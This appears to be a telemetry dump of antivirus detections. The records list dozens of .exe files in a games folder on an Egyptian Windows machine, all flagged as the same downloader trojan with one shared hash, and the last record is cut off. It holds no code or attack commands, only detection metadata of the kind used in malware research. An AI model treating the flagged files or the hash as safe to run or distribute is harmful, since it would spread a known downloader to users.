  Row(detection=Row(filename='help.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\help\\help.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rules_blackjack.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\dialogues\\Rules_Blackjack\\Rules_Blackjack.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sxx.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\sxx\\sxx.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avatars.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\sxx\\Avatars\\Avatars.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='s01.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\s01\\s01.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='_sfx.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\cw\\_SFX\\_SFX.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='th.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\th\\th.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='powerups.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\dialogues\\PowerUps\\PowerUps.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='_music.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\sxx\\_Music\\_Music.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='chips.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\sxx\\Chips\\Chips.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tokens.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\tokens\\tokens.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cards.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\vp\\cards\\cards.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='goto.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\goto\\goto.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dialogues.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\dialogues\\dialogues.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rank_comps.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\dialogues\\Rank_Comps\\Rank_Comps.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='res.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\res.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wheelcolors.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\dialogues\\WheelColors\\WheelColors.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rules_cw.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\dialogues\\Rules_CW\\Rules_CW.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rules_vp.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\dialogues\\Rules_VP\\Rules_VP.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='welcome.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\dialogues\\Welcome\\Welcome.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cw.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\cw\\cw.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='non_token.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\mm\\non_token\\non_token.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bonusgame.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\dialogues\\BonusGame\\BonusGame.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='help_th.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\dialogues\\HELP_TH\\HELP_TH.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rules_slots.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\dialogues\\Rules_Slots\\Rules_Slots.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='powerups.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\powerups\\powerups.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mm.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\mm\\mm.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:39Z'), 